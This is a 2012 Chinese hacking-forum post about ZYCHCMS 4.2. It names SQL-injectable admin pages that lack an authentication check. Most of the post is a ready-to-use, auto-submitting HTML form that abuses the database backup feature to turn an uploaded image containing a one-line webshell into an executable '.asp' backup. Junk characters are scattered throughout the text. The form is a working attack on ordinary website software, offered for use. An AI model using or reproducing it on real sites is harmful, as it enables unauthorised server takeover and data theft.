找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1861|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

7 @1 K3 J7 C$ |( i8 O, s3 {
" @8 Z8 w8 b. _' O) L' }6 Q# Y8 D/ }& v% g8 ~9 I; @$ R

$ d+ `, i' D! @( O9 a& r0 x影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)/ R) n  }9 T; m0 q: O9 o0 P
①SQL注射漏洞- v3 P; T( L' y) p. u
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp+ h" ]  o8 p. {3 {9 M
漏洞原因:未过滤
; B" _+ `- `$ ]' @# E4 V9 r5 o 漏洞代码:0 C: }7 m! z  f
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。  Z* P, f! B  ?! h: q6 E. a
修复方法:在文件开头加入代码
. K$ x# j* [: N. t; h % W, \% \  x  W1 h+ H4 [- D
# V; j8 U3 z9 a) m
②后台拿WBSHELL  R0 p8 l3 \" Y- q% S% s
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。) l+ A5 T' ?- }! @8 {' o1 p# T8 x
这里在网上找了一个,改了下,将就着用。) h6 Z3 v7 U. Z2 s8 i
以下是代码本地提交代码& W) E; h0 T( z+ x: c

. g, f. F4 O: Y+ ~2 m4 g
9 P: @  X- x+ v8 K- F* f<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
4 E8 z1 O* D  o <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>9 u( _% t$ B; w/ c
<tr>% q" i. L* W+ h0 b
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>+ O/ j" F6 X, B* C8 ~
</tr>
1 ^9 l# c: D- R* h4 b+ O: D <tr>! \- [8 W9 @& n0 z; |2 v
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>9 o2 Q* B7 @# L) Y8 ~
</span>
( q3 l; P4 g* e8 s <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
6 i& k: `8 u7 j& i, p <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
& ^- u3 w6 O" L2 j7 v0 i <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>( w5 w0 K! i5 M% O2 ?$ D1 t" i
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d& A5 @+ [6 c# a! `; q3 y
<div align=”left”>6 t; F6 {) M, u0 o+ C
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />* {$ @  n' Q+ a) L9 c  K5 l- `
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
8 v) L! w: B( X7 U) ^2 v <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
- O% B! Z( B9 ]8 v9 i, u </div></td>
& \  ]% E% p/ v; o' N </tr>
/ W- U" O: Z+ G2 x" { <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>+ H. J8 `4 d! x+ ~
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
# A* H! c( [4 X0 D! a3 t <td class=”td”><div align=”left”>. m7 V, s. c1 Q: R& t1 B; Z
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
' `& }  p7 [# N$ B% W, j [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>$ ?8 ~1 H& U4 h6 _4 m: }
</tr>* ~  X  Z1 S' |) V
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
+ C3 f9 i% }* U/ O; V- n2 ?/ g* a <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
8 x8 }0 C/ F/ L, S7 J$ m1 n <td class=”td”><div align=”left”>
* ?8 x$ E9 l9 @7 { <input type=”submit” value=”确定备份” class=”btn”
8 a3 d9 @& W/ a0 A </div></td>
5 X' t4 f. w# ~0 I8 R5 N </tr>
/ r  I- }0 K; C* F! q& w </table></td></tr></form>2 {3 g& o4 ]: A0 n7 D# ^
</table>
- W0 i" i+ I  Z2 w </td>
% ~% B8 K7 V' O1 `# N: b  C </tr>. X% n) b8 f! h
</table>
2 c, ?* N9 H2 x/ w5 h- _. { <script>& D* I% u9 A/ g
document.all.add.submit();
2 V. j4 _# f% Y; x5 x4 q. y7 A </script>
' P6 D8 r" R; `% t & G( W2 o( o& u5 T8 q8 o+ L6 H
$ Y0 @; G  w! F- T

* {1 g+ a" f4 R0 d, _7 O- x- o, H$ T8 z

* p9 n% r! @0 S- b$ T5 X
6 E7 n. \* P, g* j( X: H( u$ D$ r+ W' E
# i: i: _7 ]; D% V# J  A
0 `: g3 a! a! l- [% h. ?3 i4 J
8 S2 [/ `$ n6 ?) s3 L" r. P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表